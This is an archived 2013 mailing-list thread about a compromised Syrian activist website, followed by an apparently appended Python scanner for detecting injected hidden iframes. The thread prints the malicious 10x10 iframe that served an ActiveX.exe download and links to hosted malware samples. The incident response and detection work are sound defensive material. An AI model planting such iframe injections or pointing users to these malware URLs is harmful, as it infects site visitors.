Just a heads up, the site's been taken down; malware is here:
https://resources.telecomix.ceops.eu/material/malwares/

Also looking at getting access to the server in question for forensics.

-Andrew


On Jan 30, 2013, at 11:34 AM, SiNA Rabbani <s...@redteam.io> wrote:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

This is the malware:

https://www.virustotal.com/file/cfdd3a78a895b3f49a39402eb28b0d2134cc3086849a41a6fdfe7d829a0d4dcd/analysis/



- --SiNA


SiNA Rabbani:

holy shit:


<iframe name="I1" width="10" height="10"
src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
border="0" frameborder="0"></iframe>


:/ if you are running Windows, don't even go there!!!



Andrew Lewis:

I can get to this in 6 hours or so, maybe someone is willing to
jump on this before then?

-Andrew


On Jan 30, 2013, at 11:06 AM, KheOps <khe...@ceops.eu> wrote:


Dear Libtech,

We just saw that the website http://www.syrian-martyrs.com
is probably compromised. Every page of the website contains an
iFrame which links to a .exe file which is detected as a virus
by antivirus software:

http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe

The fact that the HTML code is present at the bottom of each page makes
me think that the "index.php" page has been changed in a way
that makes that iFrame appear on every page of the website,
after the dynamic content.

It also probably means that the attackers have some kind of
access to the server. My guess would be going to a PHP shell,
but I'm no expert in this.

Any help, clue, investigation, would be very welcome :)

Thank you, KheOps


-- Unsubscribe, change to digest, or change password at:

https://mailman.stanford.edu/mailman/listinfo/liberationtech

- --
“Be the change you want to see in the world.” Gandhi

OTR: i...@jabber.ccc.de
a5dae15f45a37e9768f6deae7b54807fc4942ec9
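The injection KheOps describes (a 10x10 iframe pointing at an .exe, appended after the page's real content) is easy to check for mechanically across a dumped webroot or a crawl of rendered pages. The scanner below is an added example written for this note, not code from anyone in the thread; it parses each page with the standard library, collects every iframe, and scores it on the traits seen here: an executable src, an off-site host, a tiny or CSS-hidden frame, and markup that appears after </html>. The sample pages, the score weights, the threshold and the function names are all my own constructions; the only piece taken from the thread is the iframe src.

```python
"""Flag injected hidden iframes in HTML pages (added example, not from the thread)."""
import re
import sys
from html.parser import HTMLParser
from urllib.parse import urlparse

# Extensions a browser hands to the OS as a program rather than renders.
EXEC_EXTENSIONS = (".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".msi", ".hta", ".vbs", ".jar")
TINY_PX = 16          # a frame this small is not meant to be seen (assumed cutoff)
FLAG_THRESHOLD = 3    # an executable src alone is enough to flag (assumed weights below)


class _IframeCollector(HTMLParser):
    """Collect every <iframe> start tag and whether it came after </html>."""

    def __init__(self):
        super().__init__()
        self.iframes = []          # list of (attrs dict, seen_after_html)
        self._after_html = False

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(({k: (v or "") for k, v in attrs}, self._after_html))

    def handle_endtag(self, tag):
        if tag == "html":
            self._after_html = True


def _px(value):
    """Parse a width/height attribute like '10' or '10px'; None if not numeric."""
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


def score_iframe(attrs, after_html, page_host):
    """Return (score, reasons) for one iframe; higher means more likely injected."""
    src = attrs.get("src", "").strip()
    if not src:
        return 0, []
    score, reasons = 0, []
    url = urlparse(src)
    if url.path.lower().endswith(EXEC_EXTENSIONS):
        score += 3
        reasons.append("executable src")
    if url.netloc and url.netloc.lower() != page_host.lower():
        score += 1                          # weak on its own: legitimate embeds are often off-site
        reasons.append("off-site src")
    w, h = _px(attrs.get("width", "")), _px(attrs.get("height", ""))
    if (w is not None and w <= TINY_PX) or (h is not None and h <= TINY_PX):
        score += 2
        reasons.append("tiny frame")
    style = re.sub(r"\s+", "", attrs.get("style", "").lower())
    if "display:none" in style or "visibility:hidden" in style:
        score += 2
        reasons.append("hidden by CSS")
    if after_html:
        score += 2                          # markup appended after </html> is a classic footer injection
        reasons.append("appears after </html>")
    return score, reasons


def find_injected_iframes(html, page_url):
    """Return a list of {src, score, reasons} for iframes scoring at or above the threshold."""
    page_host = urlparse(page_url).netloc
    collector = _IframeCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for attrs, after_html in collector.iframes:
        score, reasons = score_iframe(attrs, after_html, page_host)
        if score >= FLAG_THRESHOLD:
            findings.append({"src": attrs.get("src", ""), "score": score, "reasons": reasons})
    return findings


# Constructed sample pages: CLEAN_PAGE carries a normal video embed; INFECTED_PAGE
# is the same page with the iframe from the thread appended after </html>.
CLEAN_PAGE = """<html><body>
<h1>News</h1>
<iframe width="560" height="315" src="https://www.youtube.com/embed/example" frameborder="0"></iframe>
</body></html>
"""
INFECTED_PAGE = CLEAN_PAGE + """<iframe name="I1" width="10" height="10"
src="http://acadcisco.unisla.pt/downloads/uploads/software/ActiveX.exe"
border="0" frameborder="0"></iframe>
"""

if __name__ == "__main__":
    # Usage: python scan_iframes.py page.html [more.html ...]; with no arguments, scans the sample.
    site = "http://www.syrian-martyrs.com/"
    paths = sys.argv[1:]
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for hit in find_injected_iframes(fh.read(), site):
                print(f"{path}: {hit['src']} score={hit['score']} ({', '.join(hit['reasons'])})")
    if not paths:
        for hit in find_injected_iframes(INFECTED_PAGE, site):
            print(f"sample: {hit['src']} score={hit['score']} ({', '.join(hit['reasons'])})")
```

The off-site check is deliberately weak so a normal video embed does not trip the threshold on its own; the combination of an executable src, a 10x10 frame and placement after </html> is what makes the thread's iframe stand out. Run it over the rendered pages (a crawl, or the static files in the webroot); if every page scores the same hit, that supports the suspicion above that a shared template or index.php was modified rather than each page individually, and the next step on the server is to compare file modification times in the webroot and look for the string "acadcisco" in PHP files.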